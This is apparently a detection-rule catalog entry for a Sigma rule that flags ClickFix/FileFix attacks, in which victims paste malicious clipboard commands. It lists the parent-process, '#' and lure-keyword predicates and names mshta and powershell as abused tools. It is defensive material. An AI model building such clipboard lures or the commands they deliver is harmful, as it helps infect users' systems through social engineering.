Detection rules › Sigma
Suspicious ClickFix/FileFix Execution Pattern
Detects suspicious execution patterns where users are tricked into running malicious commands via clipboard manipulation, either through the Windows Run dialog (ClickFix) or File Explorer address bar (FileFix). Attackers leverage social engineering campaigns—such as fake CAPTCHA challenges or urgent alerts—encouraging victims to paste clipboard contents, often executing mshta.exe, powershell.exe, or similar commands to infect systems.
MITRE ATT&CK coverage
| Tactic | Techniques |
|---|---|
| Execution | T1204.001 User Execution: Malicious Link, T1204.004 User Execution: Malicious Copy and Paste |
Event coverage
| Provider | Event ID | Title |
|---|---|---|
| Sysmon | 1 | Process creation |
| Security-Auditing | 4688 | A new process has been created. |
Stages and Predicates
Stage 1: all of selection_parent
CommandLine|contains: '#'
ParentImage|endswith: '\explorer.exe'
Stage 2: all of selection_cli_captcha
or:
CommandLine|contains: account
CommandLine|contains: anti-bot
CommandLine|contains: botcheck
CommandLine|contains: captcha
CommandLine|contains: challenge
CommandLine|contains: confirmation
CommandLine|contains: fraud
CommandLine|contains: human
CommandLine|contains: identification
CommandLine|contains: identificator
CommandLine|contains: identity
CommandLine|contains: robot
CommandLine|contains: validation
CommandLine|contains: verification
CommandLine|contains: verify
Indicators
Each row is a field, operator, and value that the rule matches. The corpus column counts how many other rules in the catalog look for the same combination: high numbers point to widely-used, community-vetted indicators. Blank or 1 shows that the indicator is specific to this rule.
| Field | Kind | Values |
|---|---|---|
CommandLine | match |
|
ParentImage | ends_with |
|